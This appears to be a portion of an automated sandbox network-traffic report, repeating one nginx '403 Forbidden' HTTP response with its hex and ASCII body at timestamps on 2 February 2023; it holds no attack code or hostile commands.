            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:01 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:01 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:02 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:03 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:04 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:06 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:06 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:07 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:08 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:08 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:09 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:10 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:10 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:11 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:11 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:12 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:13 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:13 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:14 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:15 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:15 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:16 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:16 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:17 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:18 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:18 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
